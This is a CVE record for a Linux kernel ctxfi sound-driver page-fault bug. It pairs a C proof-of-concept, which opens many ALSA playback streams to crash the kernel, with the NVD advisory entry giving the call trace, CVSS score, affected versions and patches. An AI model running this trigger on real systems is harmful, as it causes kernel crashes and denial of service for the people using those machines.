CVE-2026-31602

/* * PoC for CVE-2026-31602 * This code attempts to trigger the kernel page fault * by exhausting the virtual memory allocation limit * in the snd_ctxfi driver. * Compile: gcc -o cve_2026_31602_poc cve_2026_31602_poc.c -lasound */ #include <alsa/asoundlib.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define MAX_STREAMS 256 int main() { int i, rc; snd_pcm_t *handles[MAX_STREAMS]; snd_pcm_hw_params_t *params; snd_pcm_stream_t stream = SND_PCM_STREAM_PLAYBACK; printf("[*] Starting PoC for CVE-2026-31602...\n"); for (i = 0; i < MAX_STREAMS; i++) { // Open PCM device for playback rc = snd_pcm_open(&handles[i], "default", stream, 0); if (rc < 0) { printf("[!] Could not open stream %d: %s\n", i, snd_strerror(rc)); break; } snd_pcm_hw_params_alloca(&params); snd_pcm_hw_params_any(handles[i], params); // Set hardware parameters to allocate resources snd_pcm_hw_params_set_access(handles[i], params, SND_PCM_ACCESS_RW_INTERLEAVED); snd_pcm_hw_params_set_format(handles[i], params, SND_PCM_FORMAT_S16_LE); snd_pcm_hw_params_set_channels(handles[i], params, 2); unsigned int rate = 48000; snd_pcm_hw_params_set_rate_near(handles[i], params, &rate, 0); rc = snd_pcm_hw_params(handles[i], params); if (rc < 0) { printf("[!] Cannot set hw params for stream %d\n", i); snd_pcm_close(handles[i]); break; } // Prepare the stream. This triggers ct_pcm_playback_prepare -> ct_vm_map. // Excessive calls here will aggregate memory usage > 2MB (single PTP limit). rc = snd_pcm_prepare(handles[i]); if (rc < 0) { printf("[!] Prepare failed for stream %d\n", i); snd_pcm_close(handles[i]); break; } printf("[+] Opened and prepared stream %d\n", i); } printf("[*] Opened %d streams. Check kernel logs for Oops/Page Fault.\n", i); // Keep streams open to maintain memory allocation sleep(10); // Cleanup for (int j = 0; j < i; j++) { snd_pcm_close(handles[j]); } return 0; }

{"cve": {"id": "CVE-2026-31602", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:39.263", "lastModified": "2026-04-29T20:16:49.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: ctxfi: Limit PTP to a single page\n\nCommit 391e69143d0a increased CT_PTP_NUM from 1 to 4 to support 256\nplayback streams, but the additional pages are not used by the card\ncorrectly. The CT20K2 hardware already has multiple VMEM_PTPAL\nregisters, but using them separately would require refactoring the\nentire virtual memory allocation logic.\n\nct_vm_map() always uses PTEs in vm->ptp[0].area regardless of\nCT_PTP_NUM. On AMD64 systems, a single PTP covers 512 PTEs (2M). When\naggregate memory allocations exceed this limit, ct_vm_map() tries to\naccess beyond the allocated space and causes a page fault:\n\n BUG: unable to handle page fault for address: ffffd4ae8a10a000\n Oops: Oops: 0002 [#1] SMP PTI\n RIP: 0010:ct_vm_map+0x17c/0x280 [snd_ctxfi]\n Call Trace:\n atc_pcm_playback_prepare+0x225/0x3b0\n ct_pcm_playback_prepare+0x38/0x60\n snd_pcm_do_prepare+0x2f/0x50\n snd_pcm_action_single+0x36/0x90\n snd_pcm_action_nonatomic+0xbf/0xd0\n snd_pcm_ioctl+0x28/0x40\n __x64_sys_ioctl+0x97/0xe0\n do_syscall_64+0x81/0x610\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nRevert CT_PTP_NUM to 1. The 256 SRC_RESOURCE_NUM and playback_count\nremain unchanged."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2", "versionEndExcluding": "6.6.136", "matchCriteriaId": "6F4D7A8C-6CA6-44EE-B516-3E57BDDB63C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/365c36e1a126c6aa1aecedd3a351bcabc66f0c29", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3fd0685d7fef68c2d8a04876bcf9eaa0724ad6a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/452894005b4abe141b11fe01e7bfe152e6d3860f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ad9011a795407093dcf507f6e5da1828987b4b47", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7f5ecd13cce8c2f8fa5a84c9aab65997142577e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e9418da50d9e5c496c22fe392e4ad74c038a94eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}